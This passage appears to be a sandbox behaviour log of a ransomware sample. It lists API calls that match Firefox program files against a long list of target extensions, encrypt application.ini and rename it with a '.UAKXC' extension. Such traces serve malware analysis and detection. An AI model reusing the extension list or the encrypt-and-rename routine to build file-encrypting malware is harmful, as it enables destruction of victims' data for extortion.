(x86)\\Mozilla Firefox\\application.ini", lpSrch=".cpd") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dacpac") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dad") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dadiagrams") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".daschema") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".db") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".db-shm") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".db-wal") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".db3") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dbc") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dbf") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dbs") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dbt") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dbv") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dbx") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dcb") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dct") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dcx") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".ddl") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dlis") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dp1") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dqy") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dsk") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dsn") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dtsx") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".dxl") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".eco") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".ecx") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".edb") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".epim") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".exb") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".fcd") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".fdb") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".fic") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".fmp") returned 0x0 [0139.752] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".fmp12") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".fmpsl") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".fol") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".fp3") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".fp4") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".fp5") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".fp7") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".fpt") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".frm") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".gdb") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".grdb") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".gwi") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".hdb") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".his") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".ib") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".idb") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".ihx") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".itdb") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".itw") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".jet") returned 0x0 [0139.753] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".jtx") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".kdb") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".kexi") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".kexic") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".kexis") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".lgc") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".lwx") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".maf") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".maq") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".mar") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".mas") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".mav") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".mdb") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".mdf") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".mpd") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".mrg") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".mud") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".mwb") returned 0x0 [0139.754] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".myd") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".ndf") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".nnt") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".nrmlib") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".ns2") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".ns3") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".ns4") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".nsf") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".nv") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".nv2") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".nwdb") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".nyf") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".odb") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".oqy") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".orx") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".owc") returned 0x0 [0139.755] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".p96") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".p97") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".pan") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".pdb") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".pdm") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".pnz") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".qry") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".qvd") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".rbf") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".rctd") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".rod") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".rodx") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".rpd") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".rsd") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".sas7bdat") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".sbf") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".scx") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".sdb") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".sdc") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".sdf") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".sis") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".spq") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".sql") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".sqlite") returned 0x0 [0139.756] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".sqlite3") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".sqlitedb") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".te") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".temx") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".tmd") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".tps") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".trc") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".trm") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".udb") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".udl") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".usr") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".v12") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vis") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vpd") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vvv") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".wdb") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".wmdb") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".wrk") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".xdb") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".xld") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".xmlff") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".abcddb") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".abs") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".abx") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".accdw") returned 0x0 [0139.757] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".adn") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".db2") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".fm5") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".hjt") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".icg") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".icr") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".kdb") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".lut") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".maw") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".mdn") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".mdt") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vdi") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vhd") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vmdk") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".pvm") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vmem") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vmsn") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vmsd") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".nvram") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vmx") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".raw") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".qcow2") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".subvol") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".bin") returned 0x0 [0139.758] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vsv") returned 0x0 [0139.759] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".avhd") returned 0x0 [0139.759] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vmrs") returned 0x0 [0139.759] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vhdx") returned 0x0 [0139.759] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".avdx") returned 0x0 [0139.759] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".vmcx") returned 0x0 [0139.759] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".iso") returned 0x0 [0139.759] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.759] WriteFile (in: hFile=0x210, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0139.772] WriteFile (in: hFile=0x210, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0139.773] SetEndOfFile (hFile=0x210) returned 1 [0139.773] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.773] ReadFile (in: hFile=0x210, lpBuffer=0x4610000, nNumberOfBytesToRead=0x279, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x279, lpOverlapped=0x0) returned 1 [0139.773] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xfffffd87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.773] WriteFile (in: hFile=0x210, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x279, lpOverlapped=0x0) returned 1 [0139.773] CloseHandle (hObject=0x210) returned 1 [0139.777] GetProcessHeap () returned 0xea0000 [0139.777] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef04c8 [0139.778] lstrcpyW (in: lpString1=0xef04c8, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini") returned="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini" [0139.778] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini.UAKXC" [0139.778] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini.UAKXC" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini.uakxc")) returned 1 [0139.779] GetProcessHeap () returned 0xea0000 [0139.779] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef04c8 | out: hHeap=0xea0000) returned 1 [0139.779] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee6f8 | out: hHeap=0xea0000) returned 1 [0139.779] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c68 | out: hHeap=0xea0000) returned 1 [0139.779] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0139.779] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0139.779] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0139.780] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list" (normalized: "c:\\program files (x86)\\mozilla firefox\\dependentlibs.list")) returned 0x20 [0139.780] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list" (normalized: "c:\\program files (x86)\\mozilla firefox\\dependentlibs.list"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.780] GetLastError () returned 0x0 [0139.780] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=99) returned 1 [0139.780] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".4dd") returned 0x0 [0139.780] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".4dl") returned 0x0 [0139.780] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".accdb") returned 0x0 [0139.780] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".accdc") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".accde") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".accdr") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".accdt") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".accft") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".adb") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".ade") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".adf") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".adp") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".arc") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".ora") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".alf") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".ask") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".btr") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".bdf") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".cat") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".cdb") returned 0x0 